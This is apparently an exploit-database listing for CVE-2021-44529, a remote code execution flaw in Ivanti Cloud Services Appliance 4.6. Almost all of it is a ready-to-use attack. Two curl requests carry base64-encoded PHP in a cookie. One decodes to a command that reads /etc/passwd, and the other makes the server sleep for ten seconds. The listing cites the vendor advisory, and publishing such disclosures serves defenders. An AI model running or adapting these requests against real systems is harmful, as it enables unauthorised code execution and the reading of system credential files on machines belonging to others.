ivanti endpoint manager 4.6 remote code execution (rce)
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# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE) # Date: 20/03/2022 # Exploit Author: d7x # Vendor Homepage: https://www.ivanti.com/ # Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6 # Version: CSA 4.6 4.5 - EOF Aug 2021 # Tested on: Linux x86_64 # CVE : CVE-2021-44529 ### This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz): https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies @d7x_real https://d7x.promiselabs.net https://www.promiselabs.net ### # cat /etc/passwd curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo # sleep for 10 seconds curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo
Ivanti endpoint manager 4.6 remote code execution (rce) Vulnerability / Exploit Source : Ivanti endpoint manager 4.6 remote code execution (rce)